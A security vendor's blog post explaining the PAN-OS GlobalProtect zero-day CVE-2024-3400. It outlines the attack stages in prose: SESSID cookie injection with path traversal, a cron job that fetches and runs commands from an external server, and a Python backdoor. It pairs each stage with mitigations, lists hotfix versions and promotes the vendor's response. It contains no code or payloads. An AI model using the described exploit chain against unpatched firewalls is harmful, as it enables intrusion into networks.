On April 12, 2024, Palo Alto Networks published a security advisory detailing an actively exploited maximum severity zero-day vulnerability affecting the GlobalProtect feature of PAN-OS. Dubbed CVE-2024-3400, it was assigned the maximum critical severity score of 10.0 through the Common Vulnerability Scoring System (CVSS), meaning the potential for damage was large and the path to exploit was easy for cybercriminals.
According to the Shadowserver Foundation — a nonprofit security organisation focused on spotlighting vulnerabilities, malicious activity, and emerging threats — approximately 22,542 internet-exposed firewall devices were likely vulnerable to CVE-2024-3400 at the time of disclosure.
Over the next several weeks, security teams around the country raced to mitigate the vulnerability, close gaps in their environments, and prevent or halt exploitation of the zero-day.
Vulnerabilities (whether a zero-day or a known, existing one) are one of the most common ways cybercriminals breach organisations, and there are always new ones appearing as software gets updated and as cybercriminals work behind the scenes to find new backdoors into organisations’ systems. Much can be learned, then, from the way a vulnerability is revealed, how attacks leveraging it unfold, and how security teams respond.
Let’s examine the PAN-OS firewall zero-day, how it was exploited, and how Arctic Wolf’s proactive security measures were able to stop the threat actors attempting to exploit it from acting on their objectives.
What Is CVE-2024-3400, the PAN-OS Firewall Zero-Day?
CVE-2024-3400 allows an unauthenticated remote threat actor to execute arbitrary code with root privileges on the firewall. Simply put, it allows an attacker to not only bypass the firewall’s defenses, but also to leverage the firewall itself as a beachhead for a larger intrusion.
This vulnerability was identified as a zero-day by Volexity, which during its investigation, discovered the threat actor, UTA0218, installing a custom Python backdoor named UPSTYLE on firewall devices. Following the initial access, the threat actor downloaded additional tools from remote servers controlled by the compromised devices to gain deeper access into victims’ internal networks.
Which Organizations are Impacted by CVE-2024-3400?
CVE-2024-3400 affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls when configurations for both GlobalProtect gateway and device telemetry are enabled. It does not impact Cloud NGFW, Panorama appliances, or Prisma Access, nor other PAN-OS versions.
Notably, this is not the first time threat actors have targeted GlobalProtect; a similar vulnerability (CVE-2019-1579) was exploited in 2019. Given its widespread use for remote access to corporate networks globally, GlobalProtect remains an enticing target for threat actors. But it’s not an issue limited to that particular security solution. Due to the widespread adoption of remote work, any tool that enables remote access to corporate networks is — and will remain — a target.
The Stages of Attack: A Typical Exploit of CVE-2024-3400
Based on insights from the Arctic Wolf Security Teams, we can create a common, if hypothetical, attack scenario leveraging the exploitation of the PAN-OS firewall zero-day vulnerability. The attack, like most cyber attacks, takes place over several stages, and becomes more complex depending on the attacker’s end game or goal. Below, we’ll explore the stages of attack, as well as mitigation techniques that can be deployed at each stage.
Reconnaissance
The first stage of any cyber attack is reconnaissance, where attackers gather information about their targets. For CVE-2024-3400, this involves identifying systems that may be running the vulnerable firewall software. The threat actor scans an organisation’s network for open ports and services that could be running GlobalProtect. They may use tools like Nmap to map out the target’s attack surface by sending packets to the network and analysing the response, identifying systems that are at risk of exploitation due to the presence of PAN-OS.
Mitigation:
This stage of attack typically flies under the radar of security solutions, controls, and teams, due to the high volume of vulnerability scanning going on at any given time as long as you’re connected to the internet. However, proactive efforts that focus on minimising the amount and sensitivity of data available to external parties can greatly impede a threat actor’s ability to conduct thorough reconnaissance.
Resource Development
Once potential targets are identified, threat actors create a payload which can manipulate the GlobalProtect feature into creating arbitrary files that can enable command execution with root user privileges.
Mitigation:
As this stage takes place outside of the target environment, there is little organisations can do to prevent or remediate a threat actor’s development of resources. However, in terms of general cyber attack prevention, proactive measures like a robust vulnerability management program, reducing the attack surface, employing an identity and access management (IAM) framework, or implementing a zero trust policy can make it more difficult for threat actors to move past reconnaissance or access your environment with the resources they’ve developed.
Initial Access
Next, the threat actor gains access to the PAN-OS firewall through content injection by transmitting the payload via an HTTP cookie. By setting a value in the SESSID cookie, they can manipulate PAN-OS into creating a file with that value as the filename. When combined with a path traversal technique — where the threat actor accesses files on a web server that they shouldn’t have access to — the threat actor can control not only the filename, but also where the file resides.
Mitigation:
VPNs can encrypt online traffic, making it more difficult for threat actors to observe or exploit it. Restricting web-based content can block the download, transfer, and execution of potentially uncommon file types, especially those known to be used in adversary campaigns like those leveraging CVE-2024-3400.
Execution
Next, they deploy a cron job — a script that executes after a file is written to the filesystem by the payload — which runs every minute to fetch commands hosted on an external server, which are then executed using the bash shell — a command-line interface threat actors can use to interact with an endpoint’s OS through written commands.
Mitigation:
In today’s technologically advanced, interconnected business world, everything that could be seen as a device on a network can generate an event log, data log, or security log. Comprehensive log monitoring of these log sources provides correlation and contextualisation that can alert security teams to an attack at this early stage.
Persistence
Thanks to observations by Volexity, we know that, in the next stage of attack, some threat actors install a web shell, a custom Python backdoor named UPSTYLE, on firewall devices. Volexity observed the actions of a threat actor going by the handle UTA0218 downloading additional tools from remote services controlled by the compromised devices to gain deeper access into their target’s internal networks.
Mitigation:
Implementing the principle of least privilege (PoLP), where an organisation limits access to specific systems and data only to those users who have a demonstrable need, can block threat actors from gaining the permissions or access they need to install a web shell backdoor to achieve persistence.
Next Steps
Now that the threat actor has gained access and maintained persistence, they have fully exploited the CVE-2024-3400 vulnerability and are free to carry out the next phase of their attack. Depending on the target organisation and the goals of the threat actor, this can mean anything from lateral movement to extract credentials and sensitive files, to the installation of ransomware or other malware across the environment.
Mitigation:
Network segmentation is a key factor in limiting a threat actor’s ability to move laterally through an environment, and in frustrating their attempts to obtain sensitive information or install malware.
Can CVE-2024-3400 Be Mitigated?
According to Palo Alto, “this issue is fixed in PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. When installed, these hotfixes “completely prevent the initial remote command execution, stopping subsequent post-exploitation or persistence.”
Additionally, Palo Alto has provided additional hotfixes for other commonly deployed maintenance releases. See the list provided by the company, below:
PAN-OS 10.2:
– 10.2.9-h1 (Released 4/14/24)
– 10.2.8-h3 (Released 4/15/24)
– 10.2.7-h8 (Released 4/15/24)
– 10.2.6-h3 (Released 4/16/24)
– 10.2.5-h6 (Released 4/16/24)
– 10.2.4-h16 (Released 4/18/24)
– 10.2.3-h13 (Released 4/18/24)
– 10.2.2-h5 (Released 4/18/24)
– 10.2.1-h2 (Released 4/18/24)
– 10.2.0-h3 (Released 4/18/24)
PAN-OS 11.0:
– 11.0.4-h1 (Released 4/14/24)
– 11.0.4-h2 (Released 4/17/24)
– 11.0.3-h10 (Released 4/16/24)
– 11.0.2-h4 (Released 4/16/24)
– 11.0.1-h4 (Released 4/18/24)
– 11.0.0-h3 (Released 4/18/24)
PAN-OS 11.1:
– 11.1.2-h3 (Released 4/14/24)
– 11.1.1-h1 (Released 4/16/24)
– 11.1.0-h3 (Released 4/16/24)
How Arctic Wolf Prevented Exploitation of CVE-2024-3400
The PAN-OS firewall zero-day was so globally impactful that it led to the creation of a new term used by Arctic Wolf: “Mega Threat Event.” Examples of previous threat events that would fall into this category include SolarWinds, Log4J, and Spring4Shell. During a mega event, Arctic Wolf executes a strategic runbook designed to minimise the impact on our customer base.
This runbook combines active investigation and response with a high-touch customer approach that provides updates and actionable intelligence.
As soon as the vulnerability was announced, Arctic Wolf implemented our mega event runbook, informing all customers with a Palo Alto firewall appliance of the situation, advising them on their risk status, and guiding them through mitigation steps. Patch guidance was issued and discussed with customers, and any customer at risk was continually monitored for indicators of compromise (IOCs).
During this event, Arctic Wolf:
- Executed a 96-hour response timeline
- Issued three security bulletins
- Contacted 1,800 customers
- Conducted 171 security investigations
- Developed seven new threat detections identify potential instances of vulnerability exploitation and typical post-compromise activities
- Thwarted 13 active attacks against a single customer in a single day
Most importantly, zero cases of ransomware or data exfiltration were identified, as attacks were stopped early enough in the kill chain that defenders could prohibit threat actors from acting on their objectives.
Stopping Cyber Attacks with Security Operations
Organisations that embrace security operations are more secure, more resilient, and better able to adapt to the ever-evolving threat landscape — but the reality is that very few organizations have the resources to build such capabilities in house.
The Arctic Wolf® Platform processes over five trillion events per week, enriching them with threat intelligence and risk context to drive faster threat detection, simplify incident response, and eliminate alert fatigue. By leveraging an array of detection methodologies, including AI-powered machine learning, as well as custom detection rules created specifically for your environment, our expert Security Teams deliver unique, personalized proactive and reactive protection for your organisation against modern cyber threats.
Security outcomes we deliver to our customers through this process include:
- The Arctic Wolf Platform reduces data by 99.999999% before an alert is issued
- We maintain a true positive rate of 99.9%, helping customers make informed decisions while eliminating alert fatigue
- On average, a typical customer receives one alert per day from Arctic Wolf
- When appropriate, Arctic Wolf will respond by containing and mitigating an active threat
In short, Arctic Wolf helps level the playing field against attackers, ensuring that every organisation of every size has the expertise and foundational cybersecurity needed to defend itself.
Gain a comprehensive view of the threats against your own organisation, plus actionable ideas on how to reduce your own cyber risk in the Arctic Wolf 2024 Security Operations Report.
